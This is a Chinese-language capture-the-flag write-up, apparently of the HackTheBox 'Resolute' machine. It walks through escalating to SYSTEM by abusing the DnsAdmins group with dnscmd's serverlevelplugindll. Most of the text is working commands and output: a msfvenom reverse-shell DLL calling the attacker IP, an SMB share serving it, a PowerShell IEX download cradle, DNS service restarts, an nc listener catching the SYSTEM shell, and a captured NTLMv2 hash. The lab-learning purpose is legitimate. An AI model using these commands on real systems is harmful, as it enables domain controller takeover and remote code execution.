LHOST => 10.10.16.7
msf-pro exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.7:1337 接下来我需要将dll传入到目标机器中,我可以开个smb共享让其加载我的dll或许会方便很多:
$ ./toolbox/impacket-0.9.24/examples/smbserver.py hack .
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed我可以照着它dnscmd示例,编写如下命令:
*Evil-WinRM* PS C:\Users\ryan\desktop> dnscmd.exe /config /serverlevelplugindll \\10.10.16.7\whoami.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\desktop>没回连,不要紧,或许我需要重新启动DNS服务,
*Evil-WinRM* PS C:\Users\ryan\desktop> dnscmd.exe /config /serverlevelplugindll \\10.10.16.7\whoami.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\desktop> sc.exe \\resolute stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
*Evil-WinRM* PS C:\Users\ryan\desktop> sc.exe \\resolute start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2624
FLAGS :
*Evil-WinRM* PS C:\Users\ryan\desktop>可它还是没回连:
共享也访问成功了,端口IP也对,载荷也对,命令也成功,我的经验告诉我问题不应该出现在这里,或许我遗漏了什么,在我往前翻记录时,我忽然想起,好像有个笔记告诉我说系统变更会在一分钟内自动恢复。或许我需要动作快:
dnscmd.exe /config /serverlevelplugindll \\10.10.16.7\s\whoami.dll
sc.exe \\resolute stop dns
sc.exe \\resolute start dns我疏忽了一点,或许它系统变更也会把建立的$IPC共享链接也删除,以至于我smb收到目标成功访问dll的回显信息很慢,再加上网络延迟,或许我smb不允许我设置密码,而那是我的习惯,我起一个不需要提取建立IPC链接的匿名共享:
$ ./smbserver.py s .
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed先测试一下连通性:
Evil-WinRM* PS C:\Users\ryan\desktop> net use \\10.10.16.7\s\whoami.dll
net.exe : System error 53 has occurred.
+ CategoryInfo : NotSpecified: (System error 53 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
The network path was not found.
*Evil-WinRM* PS C:\Users\ryan\desktop> [*] Incoming connection (10.10.10.169,60059)
[*] Closing down connection (10.10.10.169,60059)
[*] Remaining connections []
[*] Incoming connection (10.10.10.169,60060)
[*] Closing down connection (10.10.10.169,60060)
[*] Remaining connections []
[*] Incoming connection (10.10.10.169,60061)
[*] Closing down connection (10.10.10.169,60061)看起来没问题,但还是失败了,拉倒吧,还是wget好使:
*Evil-WinRM* PS C:\Users\ryan\desktop> wget http://10.10.16.7/whoami.dll -O whoami.dll
*Evil-WinRM* PS C:\Users\ryan\desktop> ls
Directory: C:\Users\ryan\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:34 AM 155 note.txt
-a---- 4/23/2022 6:15 AM 8704 whoami.dll
*Evil-WinRM* PS C:\Users\ryan\desktop> $ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.169 - - [23/Apr/2022 21:08:33] "GET /whoami.dll HTTP/1.1" 200 -好吧,wget也会被删除:
*Evil-WinRM* PS C:\Users\ryan\desktop> ls
Directory: C:\Users\ryan\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:34 AM 155 note.txt
*Evil-WinRM* PS C:\Users\ryan\desktop> 这是一场时间的考验,看起来我需要摸索等它下一次恢复时,快速的将dll注入进去,那我的命令需要改一下:
wget http://10.10.16.7/whoami.dll -O whoami.dll
dnscmd.exe /config /serverlevelplugindll .\whoami.dll
sc.exe \\resolute stop dns
sc.exe \\resolute start dns可以看一下它的时间:
*Evil-WinRM* PS C:\Users\ryan\desktop> net time
Current time at \\Resolute.megabank.local is 4/23/2022 6:19:03 AM
The command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\desktop> 等它到下一次整分的时候再忙活,好吧它也不是整分的规律,或许是半分,管道符也不适用,或许我可以借助一些自动化工具,它是基于将DLL注入到系统服务之中,这种攻击方式在Metsploit中有对应的模块,但是当我准备通过powershell回连会话的时候,我看到了提示信息中的一条:
*Evil-WinRM* PS C:\Users\ryan\Documents> powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.16.7/shell.ps1'))"
powershell.exe : IEX : At line:1 char:1
+ CategoryInfo : NotSpecified: (IEX : At line:1 char:1:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ function uAG0x {
+ ~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:1
+ IEX ((new-object net.webclient).downloadstring('http://10.10.16.7/she ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.Invok
eExpressionCommand
*Evil-WinRM* PS C:\Users\ryan\Documents>This script contains malicious content and has been blocked by your antivirus software.
此脚本包含恶意内容,已被杀毒软件阻止。
我大概知道了为什么没有回连了,或许我应该重置一下目标环境。那么再来一次,生成载荷:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=443 -f dll -o whoami.dll在当前目录启动smb匿名共享:
$ ./smbserver.py s .
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,49882)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:21b823d5b1d20b282614012d7e93de6f:010100000000000000c3f99b1b57d801dc0992e0706ee955000000000100100056006700730061004b005800410079000300100056006700730061004b00580041007900020010004d004600470058004d006c0076006800040010004d004600470058004d006c00760068000700080000c3f99b1b57d8010600040002000000080030003000000000000000000000000040000059bd883320297b2e2588ab272c806f552b1114d4c485915f802e15a1c1bb07b60a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:S)
[*] Closing down connection (10.10.10.169,49882)
[*] Remaining connections []命令执行一气呵成:
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll \\10.10.16.7\s\whoami.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 140
FLAGS :
*Evil-WinRM* PS C:\Users\ryan\Documents> 以system身份获取shell:
$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.169] 49883
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
whoami
whoami
nt authority\system
C:\Windows\system32>我拥有了root.txt:
Directory of C:\Users\Administrator\Desktop
12/04/2019 06:18 AM <DIR> .
12/04/2019 06:18 AM <DIR> ..
04/23/2022 07:11 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 2,483,277,824 bytes free
C:\Users\Administrator\Desktop>type root.txt